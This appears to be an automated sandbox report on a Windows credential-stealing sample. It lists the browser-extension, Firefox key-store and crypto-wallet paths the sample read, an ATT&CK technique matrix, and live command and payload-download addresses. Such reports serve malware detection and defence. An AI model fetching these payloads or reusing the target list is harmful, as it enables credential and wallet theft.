              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2240378061.0000000001227000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2185548493.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2262622308.0000000001233000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2186122101.0000000001226000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2262259485.0000000001224000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2238456679.0000000001224000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2185573560.0000000001233000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2264702772.0000000001234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2214176802.0000000001226000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2262576361.0000000001227000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2238942024.0000000001227000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2264739718.000000000123D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5044, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5044, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              12
              Process Injection
              34
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              1
              Query Registry
              Remote Services31
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Process Injection
              LSASS Memory751
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information
              Security Account Manager34
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Software Packing
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://property-imper.sbs/Q0%Avira URL Cloudsafe
              http://crl.microP50%Avira URL Cloudsafe
              https://property-imper.sbs/apil0%Avira URL Cloudsafe
              https://property-imper.sbs/apida0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              property-imper.sbs
              104.21.33.116
              truefalse
                high
                www.google.com
                142.250.181.100
                truefalse
                  high
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://property-imper.sbs/apifalse
                          high
                          https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_102.7.drfalse
                              high
                              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://property-imper.sbs/apilfile.exe, 00000000.00000003.2262622308.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2264759804.0000000001236000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2262259485.0000000001224000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2264702772.0000000001234000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2262576361.0000000001227000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_102.7.drfalse
                                    high
                                    https://www.linkedin.com/cws/share?url=$chromecache_94.7.dr, chromecache_83.7.drfalse
                                      high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/Youssef1313chromecache_102.7.drfalse
                                          high
                                          https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_94.7.dr, chromecache_83.7.drfalse
                                            high
                                            https://aka.ms/msignite_docs_bannerchromecache_94.7.dr, chromecache_83.7.drfalse
                                              high
                                              https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_83.7.drfalse
                                                high
                                                http://polymer.github.io/AUTHORS.txtchromecache_94.7.dr, chromecache_83.7.drfalse
                                                  high
                                                  https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_102.7.drfalse
                                                    high
                                                    https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_94.7.dr, chromecache_83.7.drfalse
                                                      high
                                                      https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_102.7.drfalse
                                                        high
                                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/pshelpmechoosechromecache_94.7.dr, chromecache_83.7.drfalse
                                                              high
                                                              https://aka.ms/feedback/report?space=61chromecache_102.7.drfalse
                                                                high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://185.215.113.16/off/def.exesfile.exe, 00000000.00000003.2360974253.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2575484115.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2448272714.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://learn-video.azurefd.net/vod/playerchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                      high
                                                                      https://twitter.com/intent/tweet?original_referer=$chromecache_94.7.dr, chromecache_83.7.drfalse
                                                                        high
                                                                        https://github.com/gewarrenchromecache_102.7.drfalse
                                                                          high
                                                                          http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.2575295254.0000000000EFB000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2240416920.0000000005A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://polymer.github.io/CONTRIBUTORS.txtchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                high
                                                                                https://www.mozilla.orfile.exe, 00000000.00000003.2240312873.00000000057E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_102.7.drfalse
                                                                                    high
                                                                                    https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_102.7.drfalse
                                                                                      high
                                                                                      https://client-api.arkoselabs.com/v2/api.jschromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                        high
                                                                                        https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                          high
                                                                                          https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                            high
                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/Thrakachromecache_102.7.drfalse
                                                                                                high
                                                                                                http://polymer.github.io/PATENTS.txtchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                  high
                                                                                                  https://aka.ms/certhelpchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                    high
                                                                                                    http://185.215.113.16/steam/random.exefile.exe, 00000000.00000003.2360974253.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2575484115.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2448272714.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.microP5file.exe, 00000000.00000003.2361068010.0000000001211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://github.com/mairawchromecache_102.7.drfalse
                                                                                                            high
                                                                                                            http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://schema.orgchromecache_83.7.drfalse
                                                                                                                high
                                                                                                                http://polymer.github.io/LICENSE.txtchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                                  high
                                                                                                                  https://property-imper.sbs/apidafile.exe, 00000000.00000003.2214176802.0000000001226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://property-imper.sbs/file.exe, 00000000.00000003.2185548493.0000000001223000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186122101.0000000001226000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361102069.0000000001207000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214176802.0000000001226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2240416920.0000000005A15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://aka.ms/yourcaliforniaprivacychoiceschromecache_102.7.drfalse
                                                                                                                          high
                                                                                                                          https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/nschonnichromecache_102.7.drfalse
                                                                                                                              high
                                                                                                                              http://185.215.113.16/file.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                                                  high
                                                                                                                                  https://github.com/adegeochromecache_102.7.drfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/jonschlinkert/is-plain-objectchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                                                      high
                                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2239265883.00000000057EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://octokit.github.io/rest.js/#throttlingchromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/js-cookie/js-cookiechromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                                                            high
                                                                                                                                            http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.2429586016.0000000001237000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2448272714.0000000001242000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429960341.000000000123C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schema.org/Organizationchromecache_102.7.drfalse
                                                                                                                                                high
                                                                                                                                                https://property-imper.sbs/Qfile.exe, 00000000.00000003.2361133423.000000000121B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361068010.0000000001211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://channel9.msdn.com/chromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2185663218.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185745130.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/dotnet/trychromecache_94.7.dr, chromecache_83.7.drfalse
                                                                                                                                                      high
                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      13.107.246.63
                                                                                                                                                      s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                      185.215.113.16
                                                                                                                                                      unknownPortugal
                                                                                                                                                      206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                      142.250.181.100
                                                                                                                                                      www.google.comUnited States
                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                      239.255.255.250
                                                                                                                                                      unknownReserved
                                                                                                                                                      unknownunknownfalse
                                                                                                                                                      104.21.33.116
                                                                                                                                                      property-imper.sbsUnited States
                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                      IP
                                                                                                                                                      192.168.2.6
                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                      Analysis ID:1561850
                                                                                                                                                      Start date and time:2024-11-24 13:38:09 +01:00
                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 6m 35s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                      Number of analysed new started processes analysed:10
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample name:file.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@24/61@7/6
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HCA Information:Failed
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 192.229.221.95, 2.20.68.201, 172.217.21.35, 23.218.210.69, 64.233.165.84, 172.217.17.46, 2.20.41.214, 34.104.35.123, 172.217.19.10, 142.250.181.74, 172.217.17.42, 216.58.208.234, 172.217.19.234, 142.250.181.106, 172.217.19.202, 172.217.17.74, 142.250.181.138, 23.32.239.82, 23.32.239.25, 172.217.17.35
                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, wcpstatic.microsoft.com
                                                                                                                                                      • Execution Graph export aborted for target file.exe, PID 5044 because there are no executed function
                                                                                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                      • VT rate limit hit for: file.exe
                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      07:39:04API Interceptor72x Sleep call for process: file.exe modified
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      13.107.246.63file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        CZxDiTktSY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          239.255.255.250file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              lw2HMxuVuf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              185.215.113.16file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              • 185.215.113.16/off/def.exe
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 185.215.113.16/off/def.exe
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.16/off/def.exe
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 185.215.113.16/off/def.exe
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 185.215.113.16/off/def.exe
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                              • 185.215.113.16/off/def.exe
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.16/luma/random.exe
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 185.215.113.16/off/def.exe
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              • 185.215.113.16/off/def.exe
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                              • 185.215.113.16/mine/random.exe
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
